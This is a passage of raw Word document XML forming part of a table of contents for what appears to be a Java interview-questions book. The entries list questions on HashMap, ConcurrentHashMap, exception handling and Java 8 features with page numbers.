              <w:instrText xml:space="preserve"> PAGEREF _Toc196307670 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>278</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="583102E5" w14:textId="23C4D8E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7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default capacity of HashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307671 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>279</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B48F42A" w14:textId="2D6A618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7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ere will you use ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307672 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>279</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68CBDB74" w14:textId="1E436B7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7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HashMap vs ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307673 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>281</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FAED611" w14:textId="4067B2F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7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is HashMap faster as compared to ConcurrentHashMap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307674 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>283</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21573DB8" w14:textId="281D734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7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Suppose I have multiple Employee objects with different names, so how does HashMap differentiate between different objects?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307675 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>284</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AE772EB" w14:textId="1077613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7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a Blocking Queue?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307676 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>286</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C306842" w14:textId="76CAB5E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7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Enumeration in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307677 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>288</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="381C5902" w14:textId="6178AEBE" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307678" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exception Handling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307678 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>290</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="328F81F0" w14:textId="104DD88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7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Exception Handling?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307679 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>290</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4678905B" w14:textId="51DA910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8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the hierarchy of Exception?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307680 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>291</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A46C76E" w14:textId="7F34C81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8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create Custom Exceptions?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307681 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>293</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="285D8EAB" w14:textId="4E6301D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8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handle IOException?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307682 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>294</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28370971" w14:textId="7F608EE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8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Checked Exception and Unchecked Exception?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307683 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>295</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62720D4A" w14:textId="6544C66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8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handle unchecked exceptions?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307684 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>296</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C74B689" w14:textId="0D431FF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8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will happen if I use Exception and custom exceptions together? Priority?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307685 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>296</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="348B79C4" w14:textId="2133821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8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ave you created a custom exception? What is the purpose of that?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307686 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>297</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65CB1F6E" w14:textId="17FFE4B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8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use of finally block in exception handling?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307687 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>298</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C81A6E3" w14:textId="44678E3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8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a try with resources?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307688 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>299</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54EC29D5" w14:textId="2B98632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8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ave you come across the OutOfMemory exception? How will you handle it? Explain with standalone code?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307689 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>300</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="030DA248" w14:textId="5FBBAE3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9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If you have try, catch and finally block and if I have written another exception inside catch block so how control will flow?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307690 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>301</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D1745BA" w14:textId="1C2304B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9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ave you ever got outOfMemory exceptions? Can you tell me any scenarios where you have faced this exception?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307691 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>302</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40DAB26F" w14:textId="60B60BC7" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307692" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java 8 Features</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307692 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>305</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20FC3035" w14:textId="5C8F01D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9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Java8 features?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307693 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>305</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05D2199B" w14:textId="26E210B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9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Functional Interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307694 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
